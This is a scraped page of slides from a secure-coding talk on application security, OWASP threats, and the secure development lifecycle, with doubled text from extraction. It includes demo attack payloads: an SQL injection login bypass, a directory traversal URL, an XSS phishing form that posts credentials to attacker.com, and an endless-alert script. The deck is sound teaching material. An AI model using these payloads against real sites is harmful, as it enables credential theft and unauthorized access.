Embed Size (px)
DESCRIPTION
Erez Metula at the alphageeks #4 meetup speaks about secure coding, common threats and how to address them.Check us out at:alphageeks.blogli.co.il
Citation preview
Do you write Do you write secure code?secure code?
Erez Metula, CISSPErez Metula, CISSPApplication Security Consultant & TrainerApplication Security Consultant & Trainer
[email protected]@gmail.com
•• What is application securityWhat is application security•• What are application level vulnerabilitiesWhat are application level vulnerabilities•• DemosDemos•• Security proceduresSecurity procedures•• How to improve the development lifecycleHow to improve the development lifecycle
AgendaAgenda
Growing concernGrowing concern
What is Application Security?What is Application Security?
•• It is not about network Security !!!It is not about network Security !!!•• ItIt’’s not about Firewalls, Intrusion Detection Systems, s not about Firewalls, Intrusion Detection Systems,
Operating System Hardening, Database Hardening, etc.Operating System Hardening, Database Hardening, etc.•• Network Security Mostly Ignores the Contents of HTTP Network Security Mostly Ignores the Contents of HTTP
TrafficTraffic•• Common myth Common myth –– ““We have a firewall !We have a firewall !““
•• It is about:It is about:•• Securing the code that drives a web applicationSecuring the code that drives a web application•• Securing backend systems Securing backend systems –– web server, DB, etc..web server, DB, etc..•• Securing the users !!!Securing the users !!!
Application Security Is A Different World
• Network Security• Part of IT• Networking Experts• Product Focused• 1000’s of Copies• Signature Based• Patch Management
• Application Security• Part of Business Units• Software Experts• Custom Code Focused• 1 Copy of Software• No Signatures• Prevent Vulnerabilities
We can’t rely on network security techniques to gain application security
Application security layerApplication security layer
OWASP Top 10 (2010)OWASP Top 10 (2010)
Developer Developer concateconcate SQL statementsSQL statements
Hacker types: Hacker types: ‘‘ or 1=1 or 1=1 ----
Result Result -- the first database entry (might be the Admin!)the first database entry (might be the Admin!)
http://www.victim.com/HacmeBank_v2_Website/aspx/Login.aspxhttp://www.victim.com/HacmeBank_v2_Website/aspx/Login.aspx
string string sqlsql = "select * from Users where = "select * from Users where user ='" + user ='" + User.TextUser.Text + "' + "' and and pwdpwd='" + ='" + Password.TextPassword.Text + "'"+ "'"
string string sqlsql = "select * from Users where a= "select * from Users where auser =' ' or 1=1 user =' ' or 1=1 ----' and ' and pwdpwd=''"=''"
DEMO – SQL Injection
A little bit of humor..
DEMO – Directory traversal
•• The following demo shows an innocent looking The following demo shows an innocent looking page, letting the user to download a requested page, letting the user to download a requested file from the base dir. file from the base dir.
•• Legitimate use: Legitimate use: • http://www.victim.com/SendPdf/WebForm1.aspx?file=somefile.pdf
•• But the user can get out of the base directory.. But the user can get out of the base directory.. • http://www.victim.com/SendPdf/WebForm1.aspx?
file=../../progs/secret/SecretFile.pdf
DEMO DEMO -- CrossCross--Site Scripting (XSS)Site Scripting (XSS)
•• Web browsers execute code sent from websitesWeb browsers execute code sent from websites•• HTMLHTML•• JavascriptJavascript•• Flash, etc. Flash, etc.
•• send malicious code to other userssend malicious code to other users•• the attacker is using the website to forward an attack!the attacker is using the website to forward an attack!
http://http://www.victim.com/xss/xss.asp?usernamewww.victim.com/xss/xss.asp?username==daviddavid
http://http://www.victim.com/xss/xss.asp?www.victim.com/xss/xss.asp?usernameusername=<=<brbr>please login:<form >please login:<form action="http://action="http://www.attacker.comwww.attacker.com" name=a " name=a method="post">username:<method="post">username:<brbr><input type=text ><input type=text name=b><name=b><brbr>password:<>password:<brbr><input type=password ><input type=password name=c><name=c><brbr><input class=w type=submit value="login"></form>><input class=w type=submit value="login"></form>
Demo Demo –– Denial of Service using XSSDenial of Service using XSS
•• Prevent legitimate users from using the Prevent legitimate users from using the hacmebankhacmebank site site (while true injection)(while true injection)<script><script>while(true){alert("servicewhile(true){alert("service unavailable");}</script>unavailable");}</script>
•• Such a short line can cause so much damage..!!!Such a short line can cause so much damage..!!!
•• Other possibilitiesOther possibilities•• Delete a specific user (competent?)Delete a specific user (competent?)•• Change password for a specific userChange password for a specific user•• Delete all the tables/databaseDelete all the tables/database……•• Format the server HDFormat the server HD
Business logic attacks
• Flaws that allow a user to do something that isn't allowed by the business. • Cannot be detected by a vulnerability scanner • One of the hardest to detect • Specific to the application being tested.
• Some examples• Negative amount of money• Skipping security checks• Performing operations in different order
• DEMO• Withdraw becomes a deposit• Casino
Cross Site Request Forgery (CSRF)
• Another client side attack• Resembles XSS, but quite different
• The victim’s browser is tricked into issuing a command to a vulnerable web application
• The browser outgoing request automatically include user’s data (session id, authentication tickets, ip address, etc.)
• Impact• Perform transactions on behalf of the user• Access private networks• Access sensitive data• Modify user’s data
CSRF Illustrated
3
2
Attacker sets the trap on some website on the internet(or simply via an e-mail)1
While logged into vulnerable site,victim views attacker site
Vulnerable site sees legitimate request from victim and performs the action requested
<img> tag loaded by browser – sends GET request (including credentials) to vulnerable site
Custom Code
Acc
ount
sFi
nanc
eA
dmin
istr
atio
nT
rans
actio
nsC
omm
unic
atio
nK
now
ledg
e M
gmt
E-C
omm
erce
Bus
. Fun
ctio
ns
Hidden <img> tag contains attack against vulnerable site
Application with CSRF vulnerability
CSRF via phishing e-mail
Unusual activity.msg
CSRF via malicious web site
•• You visit a malicious web siteYou visit a malicious web site•• The web site instructs your browser to submit a request The web site instructs your browser to submit a request
to some CSRF vulnerable page on the victim applicationto some CSRF vulnerable page on the victim application•• Your browser perform the operationYour browser perform the operation
•• IE7 / Mozilla IE7 / Mozilla –– at least an open tabat least an open tab•• IE6 IE6 –– from the same windowfrom the same window
•• Example:Example:•• httphttp://://wwwwww..attackerattacker..comcom//csrfcsrf//InnocentSiteInnocentSite..aspasp
What to do?
• In order to avoid application level threats, we usually perform• Penetration testing• Code review• Threat modeling• SDL – Secure Development Lifecycle
Penetration Testing
•• Testing the security of systems and architectures from a Testing the security of systems and architectures from a hackerhacker’’s point of views point of view
•• BlackboxBlackbox approach approach -- A A ““simulated attacksimulated attack””
•• Identifying weaknesses in already deployed targets, for Identifying weaknesses in already deployed targets, for example, platform tests include:example, platform tests include:•• Information disclosure Information disclosure •• Escalation of privileges to valid usersEscalation of privileges to valid users•• Denial of serviceDenial of service•• Unauthorized accessUnauthorized access
•• Penetration testing is usually done when development Penetration testing is usually done when development completescompletes
Problem - Cost of change
Code review
•• Security Code review is a process to improve software Security Code review is a process to improve software security by reviewing it security by reviewing it ““from the insidefrom the inside””
•• WhiteboxWhitebox approachapproach•• This process should be performed by the developer and This process should be performed by the developer and
by a 3rd party security personnelby a 3rd party security personnel•• The main objective is toThe main objective is to
•• Detect vulnerabilities in codeDetect vulnerabilities in code•• Identify bad application level configurationIdentify bad application level configuration•• Detect backdoorsDetect backdoors
The Threat Modeling
Identify Assets1
Create an Architecture Overview2
Decompose the Application3
Identify the Threats4
Document the Threats5
Rate the Threats6
Threat Modeling Process
We need secure development methodologies
• Current development methodologies lack security procedures
• Security should be performed from the initial project stages• Security should be embedded into the development lifecycle• SDL – Secure Development Lifecycle
SDL“Integrate” Security within Application Life Cycle
DesignRequirementsUse Cases
Code Test Deploy
Threat Modeling/ Secure Design
Code Review
Penetration Testing
Secure Deployment
Security Requirements
Don’t rely on only one countermeasure ….
SummarySummary
•• Application security is different from other security layersApplication security is different from other security layers•• Traditional security products (firewall, antivirus, IPS, SSL, Traditional security products (firewall, antivirus, IPS, SSL,
etc.) does not help to mitigate application threats.etc.) does not help to mitigate application threats.•• You should perform application security by doing You should perform application security by doing
•• Code reviewCode review•• Application penetration testApplication penetration test•• Design reviewDesign review•• Integrate security into the development cycle Integrate security into the development cycle
•• Example Example –– SDL (secure Development SDL (secure Development LifecyceLifecyce))
